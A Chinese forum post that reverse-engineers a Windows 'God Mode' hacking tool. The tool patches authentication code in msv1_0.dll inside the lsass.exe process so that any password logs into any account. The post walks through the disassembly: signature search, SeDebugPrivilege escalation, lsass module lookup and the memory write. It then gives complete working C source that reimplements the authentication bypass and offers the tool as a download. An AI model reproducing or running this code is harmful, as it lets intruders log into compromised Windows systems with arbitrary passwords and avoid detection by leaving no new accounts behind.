好友
阅读权限10
听众
最后登录1970-1-1
|
废话
家里蹲得有点郁闷,网上逛来逛去...在安全焦点看到了golds7n[LAG]写的NtGodMode.exe。
好奇了一番,菜菜的逆了它。
软件介绍:NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、
不破坏被入侵主机系统的情况下,登录系统帐号。
一、逆向分析
ESP法快速脱掉UPX后,发现是Delphi写的。
=====================
关键一
查找特征码偏移
=====================
UPX0:004032C1 loc_4032C1: ; CODE XREF: UPX0:0040325E�j
UPX0:004032C1 mov eax, off_40408C ; off_40408C dd offset aMsv1_0_dll
UPX0:004032C6 call sub_401D2C ; 判断变量是否为空
UPX0:004032CB push eax ; Msv1_0_dll
UPX0:004032CC call LoadLibraryA ; 加载Msv1_0.dll
UPX0:004032D1 mov dword_40574C, eax
UPX0:004032D6 cmp dword_40574C, 0
UPX0:004032DD jz loc_403865
UPX0:004032E3 xor eax, eax
UPX0:004032E5 mov dword_405750, eax
UPX0:004032EA mov eax, dword_40574C
UPX0:004032EF mov [ebx], eax
UPX0:004032F1 xor eax, eax
UPX0:004032F3 push ebp
UPX0:004032F4 push offset loc_403350
UPX0:004032F9 push dword ptr fs:[eax]
UPX0:004032FC mov fs:[eax], esp ; 上面特征码查找准备,不用管它。
UPX0:004032FF
UPX0:004032FF loc_4032FF: ; CODE XREF: UPX0:00403324�j
UPX0:004032FF mov eax, [ebx]
UPX0:00403301 cmp byte ptr [eax], 8Bh ;
UPX0:00403304 jnz short loc_403322
UPX0:00403306 mov eax, [ebx]
UPX0:00403308 inc eax
UPX0:00403309 cmp byte ptr [eax], 4Dh ;
UPX0:0040330C jnz short loc_403322
UPX0:0040330E mov eax, [ebx]
UPX0:00403310 add eax, 2
UPX0:00403313 cmp byte ptr [eax], 0Ch ;
UPX0:00403316 jnz short loc_403322
UPX0:00403318 mov eax, [ebx]
UPX0:0040331A add eax, 3
UPX0:0040331D cmp byte ptr [eax], 49h ;
UPX0:00403320 jz short loc_403326 ; 查找找8B 4D 0C 49 这组特征值,ok的话继续查找32 C0
UPX0:00403322
UPX0:00403322 loc_403322: ; CODE XREF: UPX0:00403304�j
UPX0:00403322 ; UPX0:0040330C�j ...
UPX0:00403322 inc dword ptr [ebx]
UPX0:00403324 jmp short loc_4032FF
UPX0:00403326 ; ---------------------------------------------------------------------------
UPX0:00403326
UPX0:00403326 loc_403326: ; CODE XREF: UPX0:00403320�j
UPX0:00403326 ; UPX0:00403340�j
UPX0:00403326 mov eax, [ebx]
UPX0:00403328 cmp byte ptr [eax], 32h
UPX0:0040332B jnz short loc_40333E
UPX0:0040332D mov eax, [ebx]
UPX0:0040332F inc eax
UPX0:00403330 cmp byte ptr [eax], 0C0h
UPX0:00403333 jnz short loc_40333E
UPX0:00403335 mov eax, [ebx]
UPX0:00403337 mov dword_405750, eax
UPX0:0040333C jmp short loc_403342
UPX0:0040333E ; ---------------------------------------------------------------------------
UPX0:0040333E
UPX0:0040333E loc_40333E: ; CODE XREF: UPX0:0040332B�j
UPX0:0040333E ; UPX0:00403333�j
UPX0:0040333E inc dword ptr [ebx]
UPX0:00403340 jmp short loc_403326
UPX0:00403342 ; ---------------------------------------------------------------------------
UPX0:00403342
UPX0:00403342 loc_403342: ; CODE XREF: UPX0:0040333C�j
UPX0:00403342 xor eax, eax
UPX0:00403344 pop edx
UPX0:00403345 pop ecx
UPX0:00403346 pop ecx
UPX0:00403347 mov fs:[eax], edx
UPX0:0040334A push offset loc_403357
UPX0:0040334F
UPX0:0040334F loc_40334F: ; CODE XREF: UPX0:00403355�j
UPX0:0040334F retn ; 返回00403357
UPX0:00403357 loc_403357: ; CODE XREF: UPX0:loc_40334F�j
UPX0:00403357 ; DATA XREF: UPX0:0040334A�o
UPX0:00403357 mov eax, dword_405750
UPX0:0040335C sub eax, dword_40574C
UPX0:00403362 mov dword_405750, eax
UPX0:00403367 mov eax, dword_40574C ; 保存好特征码偏移
UPX0:0040336C push eax
UPX0:0040336D call FreeLibrary_0 ; 释放dll
UPX0:00403372 mov byte_40589C, 0
UPX0:00403379 mov onoroff, 0
UPX0:00403380 mov byte_40589D, 0
UPX0:00403387 call sub_4030B4
UPX0:0040338C lea edx, [ebp-24h]
UPX0:0040338F mov eax, 2
UPX0:00403394 call sub_40236C
UPX0:00403399 mov eax, [ebp-24h]
UPX0:0040339C lea edx, [ebp-20h]
UPX0:0040339F call sub_402634
UPX0:004033A4 mov eax, [ebp-20h]
UPX0:004033A7 mov edx, offset aDebug ; "DEBUG"
UPX0:004033AC call sub_401C88
UPX0:004033B1 jnz short loc_4033BA ; 是否为调试模式
UPX0:004033B3 mov byte_40589C, 1 ; 是的话把调试模式设置为1
UPX0:004033BA
UPX0:004033BA loc_4033BA: ; CODE XREF: UPX0:004033B1�j
UPX0:004033BA cmp byte_40589C, 0
UPX0:004033C1 jz short loc_4033FC ; 判断调试模式
UPX0:004033C3 lea ecx, [ebp-2Ch] ; 是的话显示特征码偏移信息
UPX0:004033C6 mov edx, 8
UPX0:004033CB mov eax, dword_405750
UPX0:004033D0 call sub_4025A0
UPX0:004033D5 mov ecx, [ebp-2Ch]
UPX0:004033D8 lea eax, [ebp-28h]
UPX0:004033DB mov edx, offset aFoundOffset0x ; "Found Offset: 0x"
UPX0:004033E0 call sub_401B90
UPX0:004033E5 mov edx, [ebp-28h]
UPX0:004033E8 mov eax, off_404098
UPX0:004033ED call sub_401E24
UPX0:004033F2 call sub_401720
UPX0:004033F7 call sub_4011F4
UPX0:004033FC
UPX0:004033FC loc_4033FC: ; CODE XREF: UPX0:004033C1�j
UPX0:004033FC lea edx, [ebp-34h] ; 来到这里,接下来是参数 on | off 判断
UPX0:004033FF mov eax, 1
UPX0:00403404 call sub_40236C
UPX0:00403409 mov eax, [ebp-34h]
UPX0:0040340C lea edx, [ebp-30h]
UPX0:0040340F call sub_402634
UPX0:00403414 mov eax, [ebp-30h]
UPX0:00403417 mov edx, offset aOn ; "ON"
UPX0:0040341C call sub_401C88
UPX0:00403421 jnz short loc_40342F
UPX0:00403423 mov onoroff, 1 ; ON 的话onoroff为1
UPX0:0040342A jmp loc_4034BB ; Go
UPX0:0040342F ; ---------------------------------------------------------------------------
UPX0:0040342F
UPX0:0040342F loc_40342F: ; CODE XREF: UPX0:00403421�j
UPX0:0040342F lea edx, [ebp-3Ch]
UPX0:00403432 mov eax, 1
UPX0:00403437 call sub_40236C
UPX0:0040343C mov eax, [ebp-3Ch]
UPX0:0040343F lea edx, [ebp-38h]
UPX0:00403442 call sub_402634
UPX0:00403447 mov eax, [ebp-38h]
UPX0:0040344A mov edx, offset aOff ; "OFF"
UPX0:0040344F call sub_401C88
UPX0:00403454 jnz short loc_40345F
UPX0:00403456 mov onoroff, 0 ; off 则反之
UPX0:0040345D jmp short loc_4034BB ; 提权函数,嘿嘿
UPX0:0040345F ; ---------------------------------------------------------------------------
UPX0:0040345F
UPX0:0040345F loc_40345F: ; CODE XREF: UPX0:00403454�j
UPX0:0040345F push offset aUsage ; "Usage: "
UPX0:00403464 lea edx, [ebp-48h]
UPX0:00403467 xor eax, eax
UPX0:00403469 call sub_40236C
UPX0:0040346E mov eax, [ebp-48h]
UPX0:00403471 lea edx, [ebp-44h]
UPX0:00403474 call sub_402690
UPX0:00403479 push dword ptr [ebp-44h]
UPX0:0040347C push offset aOnOff ; " ON|OFF"
UPX0:00403481 lea eax, [ebp-40h]
UPX0:00403484 mov edx, 3
UPX0:00403489 call sub_401C04
UPX0:0040348E mov edx, [ebp-40h]
UPX0:00403491 mov eax, off_404098
UPX0:00403496 call sub_401E24
UPX0:0040349B call sub_401720
UPX0:004034A0 call sub_4011F4
UPX0:004034A5 mov eax, off_404098
UPX0:004034AA call sub_401720
UPX0:004034AF call sub_4011F4
UPX0:004034B4 push 0
UPX0:004034B6 call ExitProcess_0
========================
关键二
提权函数
========================
UPX0:004034BB call sub_402F1C ; 提权函数,嘿嘿
UPX0:004034C0 test al, al ; 成功否?
UPX0:004034C2 jz loc_403865 ; 0 则 挂
-----------------------------------------------------------------------------------------------
UPX0:00402F1C
UPX0:00402F1C sub_402F1C proc near ; CODE XREF: UPX0:loc_4034BB�p
UPX0:00402F1C
UPX0:00402F1C TokenHandle = dword ptr -1Ch
UPX0:00402F1C ReturnLength = dword ptr -18h
UPX0:00402F1C NewState = _TOKEN_PRIVILEGES ptr -14h
UPX0:00402F1C
UPX0:00402F1C push ebx
UPX0:00402F1D add esp, 0FFFFFFE8h
UPX0:00402F20 xor ebx, ebx
UPX0:00402F22 push esp ; TokenHandle
UPX0:00402F23 push 28h ; DesiredAccess
UPX0:00402F25 call GetCurrentProcess
UPX0:00402F2A push eax ; ProcessHandle
UPX0:00402F2B call OpenProcessToken
UPX0:00402F30 lea eax, [esp+1Ch+NewState.Privileges]
UPX0:00402F34 push eax ; lpLuid
UPX0:00402F35 push offset Name ; "SeDebugPrivilege"
UPX0:00402F3A push 0 ; lpSystemName
UPX0:00402F3C call LookupPrivilegeValueA
UPX0:00402F41 test eax, eax
UPX0:00402F43 jz short loc_402F75
UPX0:00402F45 mov [esp+1Ch+NewState.PrivilegeCount], 1
UPX0:00402F4D mov [esp+1Ch+NewState.Privileges.Attributes], 2
UPX0:00402F55 lea eax, [esp+1Ch+ReturnLength]
UPX0:00402F59 push eax ; ReturnLength
UPX0:00402F5A push 0 ; PreviousState
UPX0:00402F5C push 10h ; BufferLength
UPX0:00402F5E lea eax, [esp+28h+NewState]
UPX0:00402F62 push eax ; NewState
UPX0:00402F63 push 0 ; DisableAllPrivileges
UPX0:00402F65 mov eax, [esp+30h+TokenHandle]
UPX0:00402F69 push eax ; TokenHandle
UPX0:00402F6A call AdjustTokenPrivileges
UPX0:00402F6F cmp eax, 1
UPX0:00402F72 sbb ebx, ebx
UPX0:00402F74 inc ebx
UPX0:00402F75
UPX0:00402F75 loc_402F75: ; CODE XREF: sub_402F1C+27�j
UPX0:00402F75 mov eax, ebx
UPX0:00402F77 add esp, 18h
UPX0:00402F7A pop ebx
UPX0:00402F7B retn
UPX0:00402F7B sub_402F1C endp
F5 之,嘿嘿
bool __cdecl sub_402F1C()
{
bool v0; // ebx@1
HANDLE v2; // eax@1
HANDLE TokenHandle; // [sp+0h] [bp-1Ch]@1
struct _TOKEN_PRIVILEGES NewState; // [sp+8h] [bp-14h]@1
DWORD ReturnLength; // [sp+4h] [bp-18h]@2
v0 = 0;
v2 = GetCurrentProcess();
OpenProcessToken(v2, 0x28u, &TokenHandle);
if ( LookupPrivilegeValueA(0, "SeDebugPrivilege", (struct _LUID *)NewState.Privileges) )
{
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Attributes = 2;
v0 = (unsigned int)AdjustTokenPrivileges(TokenHandle, 0, &NewState, 0x10u, 0, &ReturnLength) >= 1;
}
return v0;
}
------------------------------------------------------------------------------------------------
========================
关键三
获取特征码在内存中的基址
========================
打开lsass.exe进程
00403572 8B45 B4 mov eax, dword ptr [ebp-4C]
00403575 BA FC384000 mov edx, 004038FC ; ASCII "LSASS.EXE"
0040357A E8 09E7FFFF call 00401C88
0040357F 0F85 AE020000 jnz 00403833
00403585 A1 54574000 mov eax, dword ptr [405754]
0040358A 50 push eax
0040358B 6A 00 push 0
0040358D 68 FF0F1F00 push 1F0FFF
00403592 E8 01ECFFFF call <jmp.&KERNEL32.OpenProcess> ; 打开lsass.exe进程
00403597 8BF0 mov esi, eax
00403599 85F6 test esi, esi
0040359B 75 1E jnz short 004035BB
0040359D A1 98404000 mov eax, dword ptr [404098]
004035A2 BA 10394000 mov edx, 00403910 ; ASCII "Sorry. I can't DO more."
004035A7 E8 78E8FFFF call 00401E24
004035AC E8 6FE1FFFF call 00401720
004035B1 E8 3EDCFFFF call 004011F4
NtGod通过Psapi.dll提供的API函数EnumProcesses和EnumProcessModules来实现
------------------------------------------------------------------------------------------------
UPX0:00402B18 sub_402B18 proc near ; CODE XREF: sub_402E84+C�p
UPX0:00402B18 ; sub_402EB4+C�p
UPX0:00402B18 push ebx
UPX0:00402B19 mov ebx, offset dword_4056EC
UPX0:00402B1E cmp dword ptr [ebx], 0
UPX0:00402B21 jnz loc_402CDE
UPX0:00402B27 push offset LibFileName ; "PSAPI.dll"
UPX0:00402B2C call LoadLibraryA
UPX0:00402B31 mov [ebx], eax
UPX0:00402B33 cmp dword ptr [ebx], 20h
UPX0:00402B36 jnb short loc_402B40
UPX0:00402B38 xor eax, eax
UPX0:00402B3A mov [ebx], eax
UPX0:00402B3C xor eax, eax
UPX0:00402B3E pop ebx
UPX0:00402B3F retn
UPX0:00402B40 ; ---------------------------------------------------------------------------
UPX0:00402B40
UPX0:00402B40 loc_402B40: ; CODE XREF: sub_402B18+1E�j
UPX0:00402B40 push offset aEnumprocesses ; "EnumProcesses"
UPX0:00402B45 mov eax, [ebx]
UPX0:00402B47 push eax ; hModule
UPX0:00402B48 call GetProcAddress
UPX0:00402B4D mov dword_4056F0, eax
UPX0:00402B52 push offset aEnumprocessmod ; "EnumProcessModules"
UPX0:00402B57 mov eax, [ebx]
UPX0:00402B59 push eax ; hModule
UPX0:00402B5A call GetProcAddress
UPX0:00402B5F mov dword_4056F4, eax
UPX0:00402B64 push offset aGetmodulebasen ; "GetModuleBaseNameA"
UPX0:00402B69 mov eax, [ebx]
UPX0:00402B6B push eax ; hModule
UPX0:00402B6C call GetProcAddress
UPX0:00402B71 mov dword_4056F8, eax
UPX0:00402B76 push offset aGetmodulefilen ; "GetModuleFileNameExA"
UPX0:00402B7B mov eax, [ebx]
UPX0:00402B7D push eax ; hModule
UPX0:00402B7E call GetProcAddress
UPX0:00402B83 mov dword_4056FC, eax
UPX0:00402B88 push offset aGetmodulebasen ; "GetModuleBaseNameA"
UPX0:00402B8D mov eax, [ebx]
UPX0:00402B8F push eax ; hModule
UPX0:00402B90 call GetProcAddress
UPX0:00402B95 mov dword_405700, eax
UPX0:00402B9A push offset aGetmodulefilen ; "GetModuleFileNameExA"
UPX0:00402B9F mov eax, [ebx]
UPX0:00402BA1 push eax ; hModule
UPX0:00402BA2 call GetProcAddress
UPX0:00402BA7 mov dword_405704, eax
UPX0:00402BAC push offset aGetmodulebas_0 ; "GetModuleBaseNameW"
UPX0:00402BB1 mov eax, [ebx]
UPX0:00402BB3 push eax ; hModule
UPX0:00402BB4 call GetProcAddress
UPX0:00402BB9 mov dword_405708, eax
UPX0:00402BBE push offset aGetmodulefil_0 ; "GetModuleFileNameExW"
UPX0:00402BC3 mov eax, [ebx]
UPX0:00402BC5 push eax ; hModule
UPX0:00402BC6 call GetProcAddress
UPX0:00402BCB mov dword_40570C, eax
UPX0:00402BD0 push offset aGetmoduleinfor ; "GetModuleInformation"
UPX0:00402BD5 mov eax, [ebx]
UPX0:00402BD7 push eax ; hModule
UPX0:00402BD8 call GetProcAddress
UPX0:00402BDD mov dword_405710, eax
UPX0:00402BE2 push offset aEmptyworkingse ; "EmptyWorkingSet"
UPX0:00402BE7 mov eax, [ebx]
UPX0:00402BE9 push eax ; hModule
UPX0:00402BEA call GetProcAddress
UPX0:00402BEF mov dword_405714, eax
UPX0:00402BF4 push offset aQueryworkingse ; "QueryWorkingSet"
UPX0:00402BF9 mov eax, [ebx]
UPX0:00402BFB push eax ; hModule
UPX0:00402BFC call GetProcAddress
UPX0:00402C01 mov dword_405718, eax
UPX0:00402C06 push offset aInitializeproc ; "InitializeProcessForWsWatch"
UPX0:00402C0B mov eax, [ebx]
UPX0:00402C0D push eax ; hModule
UPX0:00402C0E call GetProcAddress
UPX0:00402C13 mov dword_40571C, eax
UPX0:00402C18 push offset aGetmappedfilen ; "GetMappedFileNameA"
UPX0:00402C1D mov eax, [ebx]
UPX0:00402C1F push eax ; hModule
UPX0:00402C20 call GetProcAddress
UPX0:00402C25 mov dword_405720, eax
UPX0:00402C2A push offset aGetdevicedrive ; "GetDeviceDriverBaseNameA"
UPX0:00402C2F mov eax, [ebx]
UPX0:00402C31 push eax ; hModule
UPX0:00402C32 call GetProcAddress
UPX0:00402C37 mov dword_405724, eax
UPX0:00402C3C push offset aGetdevicedri_0 ; "GetDeviceDriverFileNameA"
UPX0:00402C41 mov eax, [ebx]
UPX0:00402C43 push eax ; hModule
UPX0:00402C44 call GetProcAddress
UPX0:00402C49 mov dword_405728, eax
UPX0:00402C4E push offset aGetmappedfilen ; "GetMappedFileNameA"
UPX0:00402C53 mov eax, [ebx]
UPX0:00402C55 push eax ; hModule
UPX0:00402C56 call GetProcAddress
UPX0:00402C5B mov dword_40572C, eax
UPX0:00402C60 push offset aGetdevicedrive ; "GetDeviceDriverBaseNameA"
UPX0:00402C65 mov eax, [ebx]
UPX0:00402C67 push eax ; hModule
UPX0:00402C68 call GetProcAddress
UPX0:00402C6D mov dword_405730, eax
UPX0:00402C72 push offset aGetdevicedri_0 ; "GetDeviceDriverFileNameA"
UPX0:00402C77 mov eax, [ebx]
UPX0:00402C79 push eax ; hModule
UPX0:00402C7A call GetProcAddress
UPX0:00402C7F mov dword_405734, eax
UPX0:00402C84 push offset aGetmappedfil_0 ; "GetMappedFileNameW"
UPX0:00402C89 mov eax, [ebx]
UPX0:00402C8B push eax ; hModule
UPX0:00402C8C call GetProcAddress
UPX0:00402C91 mov dword_405738, eax
UPX0:00402C96 push offset aGetdevicedri_1 ; "GetDeviceDriverBaseNameW"
UPX0:00402C9B mov eax, [ebx]
UPX0:00402C9D push eax ; hModule
UPX0:00402C9E call GetProcAddress
UPX0:00402CA3 mov dword_40573C, eax
UPX0:00402CA8 push offset aGetdevicedri_2 ; "GetDeviceDriverFileNameW"
UPX0:00402CAD mov eax, [ebx]
UPX0:00402CAF push eax ; hModule
UPX0:00402CB0 call GetProcAddress
UPX0:00402CB5 mov dword_405740, eax
UPX0:00402CBA push offset aEnumdevicedriv ; "EnumDeviceDrivers"
UPX0:00402CBF mov eax, [ebx]
UPX0:00402CC1 push eax ; hModule
UPX0:00402CC2 call GetProcAddress
UPX0:00402CC7 mov dword_405744, eax
UPX0:00402CCC push offset aGetprocessmemo ; "GetProcessMemoryInfo"
UPX0:00402CD1 mov eax, [ebx]
UPX0:00402CD3 push eax ; hModule
UPX0:00402CD4 call GetProcAddress
UPX0:00402CD9 mov dword_405748, eax
UPX0:00402CDE
UPX0:00402CDE loc_402CDE: ; CODE XREF: sub_402B18+9�j
UPX0:00402CDE mov al, 1
UPX0:00402CE0 pop ebx
UPX0:00402CE1 retn
UPX0:00402CE1 sub_402B18 endp
-------------------------------------------------------------------------------------------------------------
枚举进程就不贴了,下面是枚举模块并获取的代码
004035FF 833B 00 cmp dword ptr [ebx], 0
00403602 0F84 BD000000 je 004036C5
00403608 C705 A4584100 C>mov dword ptr [4158A4], 0C8
00403612 A1 A4584100 mov eax, dword ptr [4158A4]
00403617 50 push eax
00403618 B9 A8584100 mov ecx, 004158A8 ; ASCII "C:\WINDOWS\system32\msv1_0.dll"
0040361D 8B13 mov edx, dword ptr [ebx]
0040361F 8BC6 mov eax, esi
00403621 E8 8EF8FFFF call 00402EB4 ; PSAPI.EnumProcessModules
00403626 B8 94584000 mov eax, 00405894
0040362B BA A8584100 mov edx, 004158A8 ; ASCII "C:\WINDOWS\system32\msv1_0.dll"
00403630 B9 C9000000 mov ecx, 0C9
00403635 E8 F2E4FFFF call 00401B2C
0040363A 8D55 A8 lea edx, dword ptr [ebp-58]
0040363D A1 94584000 mov eax, dword ptr [405894]
00403642 E8 49F0FFFF call 00402690
00403647 8B45 A8 mov eax, dword ptr [ebp-58] ; (ASCII "msv1_0.dll")
0040364A 8D55 AC lea edx, dword ptr [ebp-54]
0040364D E8 BAEFFFFF call 0040260C
00403652 8B45 AC mov eax, dword ptr [ebp-54] ; 堆栈 ss:[0012FF6C]=00156A28, (ASCII "msv1_0.dll")
00403655 8B15 8C404000 mov edx, dword ptr [40408C] ; ds:[0040408C]=00403180 (NtGod.00403180), ASCII "msv1_0.dll"
0040365B E8 28E6FFFF call 00401C88
00403660 75 53 jnz short 004036B5
00403662 8B03 mov eax, dword ptr [ebx]
00403664 0105 50574000 add dword ptr [405750], eax
0040366A C605 9D584000 0>mov byte ptr [40589D], 1
00403671 803D 9C584000 0>cmp byte ptr [40589C], 0
00403678 74 4B je short 004036C5
0040367A 8D4D A0 lea ecx, dword ptr [ebp-60]
0040367D BA 08000000 mov edx, 8
00403682 A1 50574000 mov eax, dword ptr [405750]
00403687 E8 14EFFFFF call 004025A0
0040368C 8B4D A0 mov ecx, dword ptr [ebp-60]
0040368F 8D45 A4 lea eax, dword ptr [ebp-5C]
00403692 BA 30394000 mov edx, 00403930 ; ASCII "Found Running Target: "
00403697 E8 F4E4FFFF call 00401B90
0040369C 8B55 A4 mov edx, dword ptr [ebp-5C]
0040369F A1 98404000 mov eax, dword ptr [404098]
004036A4 E8 7BE7FFFF call 00401E24
004036A9 E8 72E0FFFF call 00401720
004036AE E8 41DBFFFF call 004011F4
004036B3 EB 10 jmp short 004036C5
004036B5 FF05 58574000 inc dword ptr [405758]
004036BB 83C3 04 add ebx, 4
004036BE 4F dec edi
004036BF ^ 0F85 3AFFFFFF jnz 004035FF
004036C5 803D 9D584000 0>cmp byte ptr [40589D], 0
004036CC 75 5B jnz short 00403729
004036CE 56 push esi
004036CF E8 5CEAFFFF call <jmp.&KERNEL32.CloseHandle>
004036D4 803D 9C584000 0>cmp byte ptr [40589C], 0
004036DB 74 19 je short 004036F6
========================
关键三
进程读写
VirtualProtectEx、
WriteProcessMemory 函数
========================
00403732 68 5C574000 push 0040575C
00403737 6A 40 push 40
00403739 6A 02 push 2
0040373B A1 50574000 mov eax, dword ptr [405750]
00403740 50 push eax
00403741 56 push esi
00403742 E8 79EAFFFF call <jmp.&KERNEL32.VirtualProtectEx>
00403747 68 98584000 push 00405898
0040374C 6A 02 push 2
0040374E 68 90404000 push 00404090
00403753 A1 50574000 mov eax, dword ptr [405750]
00403758 50 push eax
00403759 56 push esi
0040375A E8 69EAFFFF call <jmp.&KERNEL32.WriteProcessMemory>
0040375F B0 04 mov al, 4
00403761 E8 DEEFFFFF call 00402744
00403766 A1 98404000 mov eax, dword ptr [404098]
0040376B BA 70394000 mov edx, 00403970 ; ASCII "Open God Mode!"
00403770 E8 AFE6FFFF call 00401E24
00403775 E8 A6DFFFFF call 00401720
0040377A E8 75DAFFFF call 004011F4
0040377F 33C0 xor eax, eax
00403781 E8 BEEFFFFF call 00402744
00403786 EB 54 jmp short 004037DC
二、逆向小结
1、获取特征码在msv1_0.dll中的偏移位置
2、进程提权为进入lsass.exe作准备
3、枚举进程获取 lsass.exe 进程句柄
4、枚举lsass.exe模块获取msv1_0.dll在内存中的基地址
5、基地址+偏移 = 特征码的虚拟地址
6、读写内存
三、相同效果的代码
/*
Name: RNtGod
Author: Cyg07
Other: Reverse from golds7n[LAG]'s NtGod
*/
#include "stdafx.h"
#include "windows.h"
#include "tlhelp32.h"
// 提权函数
BOOL EnableDebugPriv(void)
{
HANDLE hToken;
HANDLE hProcess = GetCurrentProcess();
BOOL bREt = FALSE;
if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
{
TOKEN_PRIVILEGES tkp;
if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
{
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0);
}
}
CloseHandle(hToken);
return bREt;
}
// 获取目标进程Pid
DWORD GetTargetPid(char *pn)
{
BOOL b;
HANDLE hnd;
PROCESSENTRY32 pe;
hnd = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe.dwSize = sizeof(pe);
b=Process32First(hnd, &pe);
while(b)
{
if (lstrcmpi(pn, pe.szExeFile) == 0)
return pe.th32ProcessID;
b=Process32Next(hnd,&pe);
}
return 0;
}
// 获取特征码偏移
DWORD GetSinatureAddr(char *dn)
{
HMODULE hLib;
DWORD dwSinatureAddr;
hLib = LoadLibrary(dn);
if ( hLib )
{
// 特征码校验
__asm
{
push ebx
mov dword ptr [ebx], eax
xor eax, eax
check_1_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x8B
jnz short check_1_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x4D
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 2
cmp byte ptr [eax], 0x0C
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 3
cmp byte ptr [eax], 0x49
je short check_2_start
check_1_end:
inc dword ptr [ebx]
jmp short check_1_start
check_2_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x32
jnz short check_2_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x0c0
jnz short check_2_end
mov eax, dword ptr [ebx]
push eax
lea eax, dwSinatureAddr
pop dword ptr [eax]
mov eax, dword ptr [ebx]
jmp short check__over
check_2_end:
inc dword ptr [ebx]
jmp short check_2_start
check__over:
xor eax, eax
pop ebx
}
}
else
{
printf("Failt to found the Sinature offset.\n");
return -1;
}
dwSinatureAddr = dwSinatureAddr - (DWORD)hLib;
//printf("%08x , %x\n", dwSinatureAddr, hLib);
FreeLibrary(hLib);
return dwSinatureAddr;
}
// 获取msv1_0.dll在内存中的基址
DWORD GetModBase (DWORD dwTargetPid, char *dn)
{
DWORD dwModBase = NULL;
HANDLE hModuleSnap;
MODULEENTRY32 lpModInfo = {0};
BOOL bModule = NULL;
lpModInfo.dwSize = sizeof(lpModInfo);
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwTargetPid);
bModule = Module32First(hModuleSnap, &lpModInfo);
while ( bModule )
{
if (lstrcmpi(dn, lpModInfo.szModule) == 0)
{
dwModBase = (DWORD)lpModInfo.modBaseAddr;
//printf("%x\n", dwModBase);
break;
}
Module32Next(hModuleSnap, &lpModInfo);
}
CloseHandle(hModuleSnap);
return dwModBase;
}
// 虚拟地址转换
DWORD GetSinatureViraddr(DWORD dwSinatureAddr, DWORD dwModBase)
{
return (dwSinatureAddr + dwModBase);
}
// 去密码函数
void FuckPassword (char *checkbuff, DWORD dwTargetPid, DWORD dwSinatureVirAddr)
{
HANDLE hProcess = NULL;
char buff1[] = "\xB0\x10";
char buff2[] = "\x32\xC0";
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwTargetPid);
VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, PAGE_READWRITE, &dwTargetPid);
if ( lstrcmpi("on", checkbuff) == 0 )
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff1, 2, 0);
printf("Open God Mode");
}
else
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff2, 2, 0);
printf("Close God Mode");
}
VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, dwTargetPid, &dwTargetPid);
}
// 版权函数
void CopyRightInfo()
{
printf("------------------------------------------\n");
printf("RNtGod\n");
printf("Author: Cyg07\n");
printf("Reverse from golds7n[LAG]'s NtGod\n");
printf("------------------------------------------\n");
}
int main(int argc, char* argv[])
{
CopyRightInfo();
if (argc < 2)
{
printf("Usage: %s On|OFF\n\n", argv[0]);
return 0;
}
char *DllName = "msv1_0.dll"; // Dll
char *ProcessName = "lsass.exe"; // 进程
DWORD dwModBase = NULL; // dll在内存中的基地址
DWORD dwSinatureAddr = NULL; // 特征码偏移
DWORD dwSinatureVirAddr = NULL; // 特征码的虚拟地址
dwSinatureAddr = GetSinatureAddr(DllName); // 获取特征码偏移
if ( EnableDebugPriv() == NULL ) // 进程提权
{
printf("Failt to enable debug priv.\n");
}
DWORD dwTargetPid = GetTargetPid(ProcessName); // 获取 lsass.exe 进程
// printf("%d\n", dwTargetPid);
dwModBase = GetModBase(dwTargetPid, DllName); // 获取基地址
dwSinatureVirAddr = GetSinatureViraddr(dwSinatureAddr, dwModBase); // 转换特征码在内存的虚拟地址
// 密码处理函数
FuckPassword(argv[1], dwTargetPid, dwSinatureVirAddr);
return 0;
} |
-
-
ntgod.rar
49.37 KB, 下载次数: 32, 下载积分: 吾爱币 -1 CB
|
[复制链接]
